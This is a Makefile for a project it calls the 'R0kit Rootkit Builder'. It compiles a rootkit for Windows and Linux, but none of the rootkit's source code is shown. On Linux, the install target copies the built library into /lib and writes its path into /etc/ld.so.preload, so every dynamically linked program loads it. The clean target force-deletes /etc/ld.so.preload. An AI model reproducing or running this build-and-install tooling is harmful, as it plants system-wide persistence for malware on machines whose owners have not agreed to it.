# Enable Debugging (uncomment if you want to enable)
CFLAGS += -D ENABLE_DEBUGGING

# Determine which OS we're building on.
ifeq ($(OS),Windows_NT)
	OS_RELEASE := Windows
	CFLAGS += -D WIN32
	ifeq ($(PROCESSOR_ARCHITEW6432),AMD64)
		CFLAGS += -D AMD64
	else
		ifeq ($(PROCESSOR_ARCHITECTURE),AMD64)
			CFLAGS += -D AMD64
		endif
		ifeq ($(PROCESSOR_ARCHITECTURE),x86)
			CFLAGS += -D IA32
		endif
	endif
else
	OS_RELEASE := Linux
	UNAME_S := $(shell uname -s)
	ifeq ($(UNAME_S),Linux)
		CFLAGS += -D LINUX
	endif
	ifeq ($(UNAME_S),Darwin)
		CFLAGS += -D OSX
	endif
	UNAME_P := $(shell uname -p)
	ifeq ($(UNAME_P),x86_64)
		CFLAGS += -D AMD64
	endif
	ifneq ($(filter %86,$(UNAME_P)),)
		CFLAGS += -D IA32
	endif
	ifneq ($(filter arm%,$(UNAME_P)),)
		CFLAGS += -D ARM
	endif
endif

# Global Compiler
CC = gcc
# and Compiler flags
CFLAGS += -g -std=c99 -Wall -I../includes

# Global Linker
LINKER = gcc
# and Linker flags
LFLAGS = -g -std=c99 -Wall -I../includes

SRCDIR = src
HDRDIR = includes

OBJDIR = obj
BINDIR = bin

SOURCES  := $(wildcard $(SRCDIR)/*.c)
INCLUDES := $(wildcard $(HDRDIR)/*.h)
OBJECTS  := $(SOURCES:$(SRCDIR)/%.c=$(OBJDIR)/%.o)

default:
	@echo ---------------------------
	@echo    R0kit Rootkit Builder
	@echo ---------------------------
	@echo  - make all
	@echo  - make clean
	@echo  - make install

ifeq ($(OS_RELEASE),Windows)
TARGET = r0kit.exe
INSTALL=

MKDIRS:
	@if exist $(OBJDIR) ( echo "" ) else ( mkdir $(OBJDIR) )
	@if exist $(BINDIR) ( echo "" ) else ( mkdir $(BINDIR) )

all: clean MKDIRS $(OBJECTS) $(BINDIR)/$(TARGET)

$(BINDIR)/$(TARGET): clean $(OBJECTS)
	@$(LINKER) $(OBJECTS) $(LFLAGS) -o $@
	@echo  Linked $(SOURCES) to "$(BINDIR)/$(TARGET)" successfully!

$(OBJECTS): $(OBJDIR)/%.o : $(SRCDIR)/%.c
	@$(CC) $(CFLAGS) -c $< -o $@
	@echo  Compiled "$<" successfully!

install:
	@echo ---------------------------
	@echo    R0kit Rootkit Builder
	@echo ---------------------------
	@echo  Installing R0kit rootkit!
	@echo  TODO: This....

clean:
	@echo ---------------------------
	@echo    R0kit Rootkit Builder
	@echo ---------------------------
	@echo  Cleaning R0kit rootkit!
	@if exist $(OBJDIR) ( rmdir /S /Q $(OBJDIR) )
	@if exist $(BINDIR) ( rmdir /S /Q $(BINDIR) )
endif

ifeq ($(OS_RELEASE),Linux)
TARGET = r0kit.so
INSTALL= /lib
PRELOAD= /etc/ld.so.preload

CFLAGS += -fPIC
LFLAGS += -fPIC -shared -Wl,-soname,$(TARGET)

MKDIRS:
	@test -d $(OBJDIR) || mkdir $(OBJDIR)
	@test -d $(BINDIR) || mkdir $(BINDIR)

all: clean MKDIRS $(OBJECTS) $(BINDIR)/$(TARGET)

$(BINDIR)/$(TARGET): $(OBJECTS)
	@$(LINKER) $(OBJECTS) $(LFLAGS) -o $@
	@echo  Linked $(SOURCES) to "$(BINDIR)/$(TARGET)" successfully!

$(OBJECTS): $(OBJDIR)/%.o : $(SRCDIR)/%.c
	@$(CC) $(CFLAGS) -c $< -o $@
	@echo  Compiled "$<" successfully!

install:
	@echo ---------------------------
	@echo    R0kit Rootkit Builder
	@echo ---------------------------
	@echo  Installing R0kit rootkit!
	@echo  Testing for Installation directory!
	@test -d $(INSTALL) || mkdir $(INSTALL)
	@echo  Injecting R0kit rootkit!
	@install -m 0755 $(BINDIR)/$(TARGET) $(INSTALL)/
	@echo $(INSTALL)/$(TARGET) > /etc/ld.so.preload

clean:
	@echo ---------------------------
	@echo    R0kit Rootkit Builder
	@echo ---------------------------
	@echo  Cleaning R0kit rootkit!
	@rm -rf $(INSTALL)/$(TARGET)
	@rm -rf $(PRELOAD)
	@rm -rf $(OBJDIR)
	@rm -rf $(BINDIR)
endif
